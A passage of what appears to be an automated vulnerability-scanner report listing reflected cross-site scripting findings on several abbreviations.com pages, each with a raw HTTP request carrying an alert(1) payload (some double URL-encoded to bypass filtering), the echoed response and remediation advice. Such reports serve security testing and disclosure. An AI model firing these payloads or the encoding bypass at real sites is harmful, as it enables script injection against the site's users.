Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:33:43 GMT
Connection: close
Content-Length: 27292


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does bs2.aspx20e54</title><script>alert(1)</script>5cef4e545b4 stand for?</title>
...[SNIP]...

4.437. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d88af%2522%253balert%25281%2529%252f%252f9d70bb0239 was submitted in the REST URL parameter 1. This input was echoed as d88af";alert(1)//9d70bb0239 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspxd88af%2522%253balert%25281%2529%252f%252f9d70bb0239 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:30:14 GMT
Connection: close
Content-Length: 26683


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "bs2.aspxd88af";alert(1)//9d70bb0239";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs2.aspxd88af";alert(1)//9d70bb0239" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.438. http://www.abbreviations.com/bs2.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 41d8c</title><script>alert(1)</script>e632966bcd3 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=41d8c</title><script>alert(1)</script>e632966bcd3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:47 GMT
Connection: close
Content-Length: 26787


<title>What does&nbsp;41D8C</TITLE><SCRIPT>ALERT(1)</SCRIPT>E632966BCD3&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-rep
...[SNIP]...

4.439. http://www.abbreviations.com/bs2.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87fa9"><script>alert(1)</script>04c67320817 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=87fa9"><script>alert(1)</script>04c67320817 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:19 GMT
Connection: close
Content-Length: 26593


<title>What does&nbsp;87FA9"><SCRIPT>ALERT(1)</SCRIPT>04C67320817&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;ov
...[SNIP]...
<meta name="keywords" content="What does 87fa9"><script>alert(1)</script>04c67320817 stand for?, What does 87fa9">
...[SNIP]...

4.440. http://www.abbreviations.com/bs2.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload a6ce2<script>alert(1)</script>eaf5fd2e670 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bs2.aspx?st=a6ce2<script>alert(1)</script>eaf5fd2e670 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:16:21 GMT
Connection: close
Content-Length: 26523


<title>What does&nbsp;A6CE2<SCRIPT>ALERT(1)</SCRIPT>EAF5FD2E670&nbsp;stand for?</title>

<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;over
...[SNIP]...
<span class="hdn">'A6CE2<SCRIPT>ALERT(1)</SCRIPT>EAF5FD2E670'</span>
...[SNIP]...

4.441. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab542%253cscript%253ealert%25281%2529%253c%252fscript%253e78bee243156 was submitted in the REST URL parameter 1. This input was echoed as ab542<script>alert(1)</script>78bee243156 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspxab542%253cscript%253ealert%25281%2529%253c%252fscript%253e78bee243156 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:55 GMT
Connection: close
Content-Length: 27203


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>78bee243156";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "getsugg.aspxab542<script>alert(1)</script>78bee243156" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "getsugg.aspxab542<script>
...[SNIP]...

4.442. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3ec8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf1a48cd5fc was submitted in the REST URL parameter 1. This input was echoed as c3ec8"><script>alert(1)</script>af1a48cd5fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspxc3ec8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf1a48cd5fc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:36:54 GMT
Connection: close
Content-Length: 27223


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does getsugg.aspxc3ec8"><script>alert(1)</script>af1a48cd5fc stand for?, What does getsugg.aspxc3ec8">
...[SNIP]...

4.443. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 173fe%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6bcc3c130 was submitted in the REST URL parameter 1. This input was echoed as 173fe</title><script>alert(1)</script>df6bcc3c130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspx173fe%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6bcc3c130 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:43:18 GMT
Connection: close
Content-Length: 27385


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does getsugg.aspx173fe</title><script>alert(1)</script>df6bcc3c130 stand for?</title>
...[SNIP]...

4.444. http://www.abbreviations.com/getsugg.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /getsugg.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f167%2522%253balert%25281%2529%252f%252f2f81dfde9c5 was submitted in the REST URL parameter 1. This input was echoed as 3f167";alert(1)//2f81dfde9c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /getsugg.aspx3f167%2522%253balert%25281%2529%252f%252f2f81dfde9c5 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:39:24 GMT
Connection: close
Content-Length: 26852


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "getsugg.aspx3f167";alert(1)//2f81dfde9c5";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "getsugg.aspx3f167";alert(1)//2f81dfde9c5" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.h
...[SNIP]...

4.445. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8287f%253cscript%253ealert%25281%2529%253c%252fscript%253ecc7e34a63cc was submitted in the REST URL parameter 1. This input was echoed as 8287f<script>alert(1)</script>cc7e34a63cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspx8287f%253cscript%253ealert%25281%2529%253c%252fscript%253ecc7e34a63cc HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:25 GMT
Connection: close
Content-Length: 27238


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>cc7e34a63cc";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "justadded.aspx8287f<script>alert(1)</script>cc7e34a63cc" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "justadded.aspx8287f<script>
...[SNIP]...

4.446. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8db78%2522%253balert%25281%2529%252f%252f54c807c3c7d was submitted in the REST URL parameter 1. This input was echoed as 8db78";alert(1)//54c807c3c7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspx8db78%2522%253balert%25281%2529%252f%252f54c807c3c7d HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:25:05 GMT
Connection: close
Content-Length: 26906


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "justadded.aspx8db78";alert(1)//54c807c3c7d";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "justadded.aspx8db78";alert(1)//54c807c3c7d" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location
...[SNIP]...

4.447. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload fff86%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6029eb64ec was submitted in the REST URL parameter 1. This input was echoed as fff86</title><script>alert(1)</script>c6029eb64ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspxfff86%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6029eb64ec HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:31:09 GMT
Connection: close
Content-Length: 27473


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does justadded.aspxfff86</title><script>alert(1)</script>c6029eb64ec stand for?</title>
...[SNIP]...

4.448. http://www.abbreviations.com/justadded.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /justadded.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42381%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c044cd5629 was submitted in the REST URL parameter 1. This input was echoed as 42381"><script>alert(1)</script>8c044cd5629 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /justadded.aspx42381%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c044cd5629 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:23:28 GMT
Connection: close
Content-Length: 27276


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does justadded.aspx42381"><script>alert(1)</script>8c044cd5629 stand for?, What does justadded.aspx42381">
...[SNIP]...

4.449. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6714c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6150d8cc99d was submitted in the REST URL parameter 1. This input was echoed as 6714c"><script>alert(1)</script>6150d8cc99d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspx6714c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6150d8cc99d HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:31 GMT
Connection: close
Content-Length: 27195


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does random.aspx6714c"><script>alert(1)</script>6150d8cc99d stand for?, What does random.aspx6714c">
...[SNIP]...

4.450. http://www.abbreviations.com/random.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /random.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7bde3%253cscript%253ealert%25281%2529%253c%252fscript%253e480139ed9b was submitted in the REST URL parameter 1. This input was echoed as 7bde3<script>alert(1)</script>480139ed9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /random.aspx7bde3%253cscript%253ealert%25281%2529%253c%252fscript%253e480139ed9b HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
